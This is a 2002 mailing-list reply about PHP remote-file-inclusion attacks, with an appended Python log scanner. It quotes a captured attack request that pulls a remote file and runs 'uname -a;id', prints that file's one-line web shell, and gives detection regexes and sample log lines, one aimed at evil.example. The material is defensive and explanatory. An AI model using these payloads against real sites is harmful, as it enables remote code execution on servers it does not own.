Security Incidents mailing list archives

Re: Good practical php attack example


From: "Steven M. Christey" <coley () linus mitre org>
Date: Wed, 18 Sep 2002 22:49:26 -0400 (EDT)


zeno <bugtraq () cgisecurity net> said:

I figured a few people may find this interesting.


200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"

contents of www.jtecx.hpg.com.br/jtec.txt

------------------- start snip

<?php 
system($cmd); 
?>

------------------- end snip

A number of PHP scripts have demonstrated this type of vulnerability,
which was documented in "A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP Applications" by Shaun Clowes; see
http://www.securereality.com.au/studyinscarlet.txt
(http://www.zend.com/zend/art/art-oertli.php also looks useful).  This
has been a topic of discussion on the webappsec list.

Basically, PHP can allow the programmer to access files from remote
sites.  PHP scripts that don't properly filter arguments to an
"include" command can have a remote URL injected by the attacker.  PHP
also allows you to define variables as a parameter (field) into the
script.  The combination of these factors makes it easy for an
attacker to execute code in the vulnerable application.  Note: this
may be dependent on configuration and/or the PHP version.

Some vulnerable applications are:


  BUGTRAQ:20001125 Security problems with TWIG webmail system
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
  (CVE: CVE-2000-1166)

  BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
  (CVE: CAN-2002-0206)

  [this could be the vulnerability being exploited in zeno's example]

  BUGTRAQ:20020506 b2 php remote command execution
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
  (CVE: CAN-2002-0734)

  BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
  (CVE: CAN-2002-0764)


A generic Perl regular expression to catch some of these exploits is:

  /\.php[2-9]?\?.*=http:\/\//

This seems to do a good job, although it could generate some false
positives for valid PHP scripts that pass URLs as arguments, e.g. for
redirecting the user out of the site.

- Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
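[Editor's note, added to this archive page: the following is an added example, not code from Steve's message or from any of the projects he lists. It runs his Perl expression over access-log lines the way one would with perl -ne, and beside it a decoded-parameter check that separates the two cases he raises: the exploit request zeno captured, and a legitimate script that takes a URL as an argument (the false positive). The first sample line reproduces zeno's logged request; the 10.0.0.x lines, the hosts example.com and evil.example, the redirect.php script and the (script, parameter) allowlist are constructed for the example. The fourth line shows one thing the regex cannot see: a value sent as http%3A%2F%2F contains no literal "http://", so the pattern does not match it, while decoding the parameter first does.]

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Steve's Perl expression /\.php[2-9]?\?.*=http:\/\// carried over unchanged
# (Python needs no escaping of the slashes). It is applied to the raw request
# target, exactly as perl -ne would apply it to the log line.
STEVE_PATTERN = re.compile(r"\.php[2-9]?\?.*=http://")

# Apache combined log format: client IP, timestamp, quoted request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

PHP_SCRIPT = re.compile(r"\.php[2-9]?$")
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Hypothetical site-specific allowlist of (script, parameter) pairs that are
# known to carry a URL legitimately, e.g. an outbound redirector. This is the
# knob that suppresses the false positive Steve describes.
URL_PARAM_ALLOWLIST = {("/redirect.php", "url")}

# Constructed sample log. Line 1 reproduces zeno's captured request; the others
# are made up for the example (example.com and evil.example are placeholders).
SAMPLE_LOG = """\
200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
10.0.0.5 - - [14/Sep/2002:16:50:01 -0400] "GET /redirect.php?url=http://www.example.com/ HTTP/1.0" 302 0 "-" "Mozilla/4.0"
10.0.0.6 - - [14/Sep/2002:16:51:12 -0400] "GET /index.php?file=about.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
10.0.0.7 - - [14/Sep/2002:16:52:40 -0400] "GET /index.php?file=http%3A%2F%2Fevil.example%2Fjtec.txt&cmd=id HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""


def query_params(query):
    """Split a query string on '&' and percent-decode each name and value.
    Done by hand so that ';' (used in zeno's cmd=uname -a;id) is never treated
    as a pair separator, whatever the Python version."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def remote_params(target):
    """Return [(name, value)] for parameters whose decoded value is a remote URL."""
    query = urlsplit(target).query
    return [(n, v) for n, v in query_params(query)
            if v.lower().startswith(REMOTE_SCHEMES)]


def classify(line):
    """Classify one access-log line; None if it is not a combined-format line."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = m.group("target")
    script = urlsplit(target).path
    remote = remote_params(target)
    flagged = [(n, v) for n, v in remote
               if (script, n) not in URL_PARAM_ALLOWLIST]
    return {
        "ip": m.group("ip"),
        "script": script,
        "steve_regex": bool(STEVE_PATTERN.search(target)),
        "remote_params": remote,
        # A PHP script handed a non-allowlisted remote URL is what we alert on.
        "suspicious": bool(flagged) and bool(PHP_SCRIPT.search(script)),
        # The trailing cmd= parameter is the tell-tale of the jtec.txt-style shell.
        "has_cmd": any(n == "cmd" for n, _ in query_params(urlsplit(target).query)),
    }


def scan(log_text):
    """Classify every parseable line of an access log, in order."""
    results = []
    for line in log_text.splitlines():
        r = classify(line)
        if r is not None:
            results.append(r)
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f'{r["ip"]:15} {r["script"]:15} regex={r["steve_regex"]!s:5} '
              f'suspicious={r["suspicious"]!s:5} cmd={r["has_cmd"]!s:5} {r["remote_params"]}')
```

Run over the sample, the regex and the decoded check agree on zeno's request and on the plain about.html request, disagree on the redirector (regex hit, allowlisted by the check) and on the percent-encoded request (missed by the regex, caught by the check). Whether that last case matters for a given site depends on whether the vulnerable script decodes the parameter before including it, which the log alone does not tell you; the point is only that a literal "http://" in the pattern is a choice, not a guarantee.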

